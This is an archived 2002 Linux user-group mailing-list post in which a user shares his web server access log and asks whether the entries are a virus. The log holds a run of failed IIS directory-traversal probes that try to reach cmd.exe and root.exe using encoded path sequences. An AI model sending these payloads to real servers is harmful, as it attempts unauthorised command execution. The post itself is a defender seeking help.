[olug] Is this a virus?
Jonathan Warren
jonwarren at cox.net
Tue May 21 18:39:25 UTC 2002
I am getting these in my access.log. Any suggestions on how to shut up the offending servers?
68.13.41.165 - - [10/May/2002:14:20:40 -0500] "GET /scripts/root.exe?/c+dir HTTP
/1.0" 404 287
68.13.41.165 - - [10/May/2002:14:20:43 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1
.0" 404 285
68.13.41.165 - - [10/May/2002:14:20:45 -0500] "GET /c/winnt/system32/cmd.exe?/c+
dir HTTP/1.0" 404 295
68.13.41.165 - - [10/May/2002:14:20:47 -0500] "GET /d/winnt/system32/cmd.exe?/c+
dir HTTP/1.0" 404 295
68.13.41.165 - - [10/May/2002:14:20:49 -0500] "GET /scripts/..%255c../winnt/syst
em32/cmd.exe?/c+dir HTTP/1.0" 404 309
68.13.41.165 - - [10/May/2002:14:20:51 -0500] "GET /_vti_bin/..%255c../..%255c..
/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326
68.13.41.165 - - [10/May/2002:14:20:53 -0500] "GET /_mem_bin/..%255c../..%255c..
/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326
68.13.41.165 - - [10/May/2002:14:20:55 -0500] "GET /msadc/..%255c../..%255c../..
%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 4
04 342
68.13.41.165 - - [10/May/2002:14:20:57 -0500] "GET /scripts/..%c1%1c../winnt/sys
tem32/cmd.exe?/c+dir HTTP/1.0" 404 308
68.13.41.165 - - [10/May/2002:14:20:59 -0500] "GET /scripts/..%c0%2f../winnt/sys
tem32/cmd.exe?/c+dir HTTP/1.0" 404 308
68.13.41.165 - - [10/May/2002:14:21:00 -0500] "GET /scripts/..%c0%af../winnt/sys
tem32/cmd.exe?/c+dir HTTP/1.0" 404 308
68.13.41.165 - - [10/May/2002:14:21:01 -0500] "GET /scripts/..%c1%9c../winnt/sys
tem32/cmd.exe?/c+dir HTTP/1.0" 404 308
68.13.41.165 - - [10/May/2002:14:21:02 -0500] "GET /scripts/..%%35%63../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 400 292
68.13.41.165 - - [10/May/2002:14:21:03 -0500] "GET /scripts/..%%35c../winnt/syst
em32/cmd.exe?/c+dir HTTP/1.0" 400 292
68.13.41.165 - - [10/May/2002:14:21:04 -0500] "GET /scripts/..%25%35%63../winnt/
system32/cmd.exe?/c+dir HTTP/1.0" 404 309
68.13.41.165 - - [10/May/2002:14:21:05 -0500] "GET /scripts/..%252f../winnt/syst
em32/cmd.exe?/c+dir HTTP/1.0" 404 309
167.132.64.131 - - [14/May/2002:07:03:55 -0500] "GET /~thechunk HTTP/1.1" 301 33
3
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
For help contact olug-help at olug.org - run by ezmlm
to unsubscribe, send mail to olug-unsubscribe at olug.org
or `mail olug-unsubscribe at olug.org < /dev/null`
(c)1998-2002 OLUG http://www.olug.org
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
More information about the OLUG
mailing list